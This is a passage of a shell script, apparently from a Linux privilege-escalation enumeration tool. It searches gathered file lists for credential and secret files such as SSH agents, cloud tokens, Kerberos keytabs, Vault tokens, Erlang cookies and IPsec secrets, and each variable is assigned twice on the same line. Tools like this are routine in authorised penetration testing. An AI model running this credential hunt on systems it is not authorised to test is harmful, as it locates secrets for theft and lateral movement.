PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70)
PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70)
PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70)
PSTORAGE_KERBEROS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70)
PSTORAGE_KIBANA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70)
PSTORAGE_KNOCKD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70)
PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "logstash$" | sort | uniq | head -n 70) PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "logstash$" | sort | uniq | head -n 70)
PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70)
PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70)
PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vault-token$" | sort | uniq | head -n 70) PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vault-token$" | sort | uniq | head -n 70)
PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "couchdb$" | sort | uniq | head -n 70) PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "couchdb$" | sort | uniq | head -n 70)
PSTORAGE_REDIS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "redis\.conf$" | sort | uniq | head -n 70) PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "redis\.conf$" | sort | uniq | head -n 70)
PSTORAGE_MOSQUITTO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70)
PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "neo4j$" | sort | uniq | head -n 70) PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "neo4j$" | sort | uniq | head -n 70)
PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70)
PSTORAGE_ERLANG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) PSTORAGE_ERLANG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70)
PSTORAGE_GMV_AUTH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70)
PSTORAGE_IPSEC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) PSTORAGE_IPSEC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70)
